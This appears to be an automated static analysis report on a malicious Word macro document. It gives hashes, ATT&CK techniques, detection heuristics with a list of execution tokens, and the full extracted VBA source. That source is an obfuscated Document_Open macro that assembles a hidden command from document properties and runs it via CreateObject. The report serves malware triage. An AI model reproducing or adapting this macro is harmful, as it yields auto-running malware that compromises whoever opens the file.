Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 95e8557b77f64be5…

MALICIOUS

Office (OOXML)

Size: 52.7 KB | Created: 2020-12-02 02:49:00 UTC | Authoring application: Microsoft Office Word 15.0000 | First seen: 2026-06-04
MD5: ba8413ec5d573aa045b5c989dcd4804e SHA-1: e0b6a3357d5c09c12ffdbdceb8bb6020d8b6fa0e SHA-256: 95e8557b77f64be520617d321763a80e49e38e9ffab5692d25ce9ea2b030a83b
Risk Score: 112

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic | T1566.001 Phishing: Spearphishing Attachment | T1140 Deobfuscate/Decode Files or Information

The sample is an OOXML document containing a VBA macro that automatically executes via the Document_Open subroutine. The macro utilizes CreateObject and appears to be heavily obfuscated, suggesting an intent to download and execute a secondary payload. The presence of a Document_Open macro and CreateObject call are strong indicators of malicious intent, commonly seen in macro-based malware.

Heuristics (6)

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        CreateObject(osJsmKJzfGJP).Run$ mNaCbmDx + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + atMRBBmV, 0
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs:
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6619 bytes
SHA-256: 0e1cf4849ca812ec5b8d45aa54dc4dd6fbc93ec40e42d1de68bada9ba25db58a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
76 of 120 identifiers look randomly generated (e.g. 'DxxjIHtIIMPNc') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    DqwIddXugwNj
End Sub
Function yKvCXNf(vRKbufsX)
    YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
     LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
     MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
     WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
     XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
     KADXEmH = ActiveDocument.CustomDocumentProperties(vRKbufsX)
     yKvCXNf = KADXEmH
     YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
     LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
     MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
     WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
     XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
End Function
Function mRfpfKhGSD()
    mCzGYYaxRLX = 8385
    Dim MCGPUwUZMWy(8385)
    caMKKbnBu = ("rFNuCnmpUU")
     ALKNUwLcpPu = ("SLCZxtuyhF")
     MczvCeNBH = ("XLSHkERKtnR")
     MCGPUwUZMWy(7904) = UcwcACY
     MCGPUwUZMWy(2787) = rbUkPum
     MCGPUwUZMWy(684) = 7163 + 811 + 710 / 7663 / 5363 / 1108 - 3395 - 7739 + 4644 + 8393 + 9078
     MCGPUwUZMWy(1867) = KwvDMWrrG
     MCGPUwUZMWy(1721) = LzkZWpB
     MCGPUwUZMWy(7960) = 8725
     MCGPUwUZMWy(8262) = 7312
     MCGPUwUZMWy(6212) = 8270
     MCGPUwUZMWy(298) = ZUpymUKM
     MCGPUwUZMWy(3896) = 954 + 9998 / 9266 / 6580 - 736 - 883 + 2313 + 1188 + 5675
      For mCzGYYaxRLX = 7999 To 5163
    MCGPUwUZMWy(mCzGYYaxRLX) = mCzGYYaxRLX
    Next
    KAyYxEHgrP = MCGPUwUZMWy(3814) + MCGPUwUZMWy(8385)
     ZBXEkbtP = MCGPUwUZMWy(3170) + MCGPUwUZMWy(1765) + MCGPUwUZMWy(8385)
End Function
Sub DqwIddXugwNj()
    mRfpfKhGSD
    YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
    LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
    MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
    WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
    gHXrdcyrg
    XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
    osJsmKJzfGJP = yKvCXNf("ttiIemVErw") + yKvCXNf("gAevmjiJlO") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + "." + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + yKvCXNf("RUMyrHTBVP") + drgLHvTZD + RzsFTKsMa
    YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
    LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
    MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
    WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
    XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
    DxxjIHtIIMPN = yKvCXNf("qERbRhbUQE") + yKvCXNf("RUMyrHTBVP") + NBhWRnnr + nGmERhbgD + yKvCXNf("BXpvaFjLUP") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + GZnvfVd
    DxxjIHtIIMPNc = qbxGDawevX.gZakiPWhOV
    mNaCbmDx = DxxjIHtIIMPN + " " + DxxjIHtIIMPNc + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + fPsFbYX
    CreateObject(osJsmKJzfGJP).Run$ mNaCbmDx + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + atMRBBmV, 0
    YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
    LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
    MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
    WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
    XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
End Sub


Public Function VKbZcLUg()
    YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
    LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
    MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
    WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
    XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
    DEBAKSwY = yKvCXNf("ankMNxSvDuv") + yKvCXNf("fDaHszez") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + yKvCXNf("kfShLKvtYaW") + yKvCXNf("drgLHvTZD") + yKvCXNf("RzsFTKsMa")
    YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
    LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
    MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
    WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
    XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
    ZneZkvTk = yKvCXNf("PpRDVaYk") + yKvCXNf("SnVfbyV") + yKvCXNf("NBhWRnnr") + yKvCXNf("nGmERhbgD") + yKvCXNf("MHmBmVtxxeD") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + yKvCXNf("GZnvfVd")
    mNaCbmDx = ZneZkvTk + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + fPsFbYX
    CreateObject(DEBAKSwY).Run$ mNaCbmDx + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + atMRBBmV, 0
    YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
    LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
    MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
    WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
    XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
 End Function
 
Function gHXrdcyrg()
    WavCCbxD = 8004
    Dim EhAUrkkxwMG(8004)
    naRAuCU = ("vgaYmNPnVX")
     EhAUrkkxwMG(2991) = eNECkccF
     EhAUrkkxwMG(6466) = FbcdBnKRuK
     EhAUrkkxwMG(3066) = kfEeTmdvHNy
     EhAUrkkxwMG(3977) = vLuXaKtP
     EhAUrkkxwMG(2869) = 4459 + 146 + 7490 / 9816 - 7410 - 8463 - 2553 + 451 + 8893
     EhAUrkkxwMG(5881) = mtpNLGb
     EhAUrkkxwMG(5248) = gfxcZDpkv
     EhAUrkkxwMG(2458) = SsvSpWe
     EhAUrkkxwMG(458) = AVUPYHGfC
     EhAUrkkxwMG(4552) = 198
     EhAUrkkxwMG(5266) = XvRCbwhh
     EhAUrkkxwMG(4843) = eXHbUGY
     EhAUrkkxwMG(6934) = dHZNEDyDcv
     EhAUrkkxwMG(4138) = MvYmwSeRUT
     EhAUrkkxwMG(6033) = 8623 + 2405 / 7340 / 2292 - 2848 - 4607 + 3843 + 888 + 8671
      For WavCCbxD = 830 To 4845
    EhAUrkkxwMG(WavCCbxD) = WavCCbxD
    Next
    PHZLUddDVam = EhAUrkkxwMG(7146) + EhAUrkkxwMG(7682) + EhAUrkkxwMG(122) + EhAUrkkxwMG(417) + EhAUrkkxwMG(4616) + EhAUrkkxwMG(1498) + EhAUrkkxwMG(8004)
End Function

Attribute VB_Name = "Module1"

Attribute VB_Name = "qbxGDawevX"
Attribute VB_Base = "0{A68EF772-A757-4BB8-8985-B203CDD06A2D}{E0A0B256-F47C-470C-9299-1D9722C80184}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 51200 bytes
SHA-256: 64cfd1b9d71278ef0cef9b129e2aadf256866ded3df286c2346a59ca66906e94
Detection
ClamAV: No threats found
Obfuscation or payload: likely
211 of 371 identifiers look randomly generated (e.g. 'A9ABB1C7B5C7B5C7B5C7B5') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).